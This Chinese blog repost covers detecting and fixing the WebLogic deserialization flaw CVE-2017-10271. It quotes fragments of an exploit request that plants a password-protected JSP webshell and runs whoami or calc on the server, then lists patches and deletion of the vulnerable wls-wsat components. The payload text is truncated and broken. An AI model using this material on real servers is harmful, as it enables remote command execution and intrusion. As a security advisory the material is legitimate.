博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
weblogic反序列化漏洞
阅读量:6969 次
发布时间:2019-06-27

本文共 1972 字,大约阅读时间需要 6 分钟。

hot3.png

1、检测工具

https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271

2、http请求模拟工具

Fiddler

3、检测方法

ontent-Type: text/xml
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(""); } %>]]>

这段代码是通过http://127.0.0.1:7001/wls-wsat/CoordinatorPortType11接口在服务里写入jsp脚本,这里是test.jsp,jsp的访问路径是http://127.0.0.1:7001/bea_wls_internal/test.jsp?password=secfree&command=whoami,结果如下

------------------------------------------------------------------------------------------------------

calc

这段代码是通过http://127.0.0.1:7001/wls-wsat/CoordinatorPortType11接口在服务里的计算器,结果如下

---------------------------------------------------------------------------------------------------

4、解决办法

升级Oracle2017年10月份补丁和2018年4月的补丁。

2.对访问wls-wsat的资源进行访问控制。

3.临时解决方案

在不影响业务前提下,根据实际环境路径,删除WebLogic程序下列war包及目录。

       

rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.warrm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.warrm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

        重启WebLogic服务或系统后,确认以下链接访问是否为404:

        

5、2018年4月新漏洞

需要更新2018年4月的补丁时需要注意将bsu.cmd的虚拟机最大内存设置成3072

安装新的补丁,请使用绿盟云https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?page_id=12测试

转载于:https://my.oschina.net/u/3769440/blog/1842164

你可能感兴趣的文章
dede个人中心php在哪,dedecms织梦如何自定义会员中心目录名称的方法
查看>>
php怎么升级到5.4,php从5.2升级到5.4
查看>>
linux 运维高级脚本生成器,Linux运维实例 高效运维的工具--shell脚本
查看>>
linux配置redis服务,Linux下安装Redis并设置相关服务
查看>>
Linux的rsa命令,linux命令:ssh scp ssh-keygen -t rsa用法(示例代码)
查看>>
常见前端面试题【转】
查看>>
poj1106
查看>>
个人知识管理工具 PinPKM
查看>>
Jobs in Codility they're hiring
查看>>
linux下VNC的配置及使用
查看>>
为什么.NET Framework就没有个专门的P/Invoke Library?
查看>>
Silverlight动态设置WCF服务Endpoint
查看>>
lucene对日期(date)和整形(int)处理
查看>>
hdu 4081 次小生成树
查看>>
HtmlNodeType枚举
查看>>
基于TCP的多进程echo服务器
查看>>
ASP.NET页面在IE缓存问题的解决
查看>>
最简单的Epoll模型代码
查看>>
数据结构之字符串
查看>>
blob字段存储文件并读取
查看>>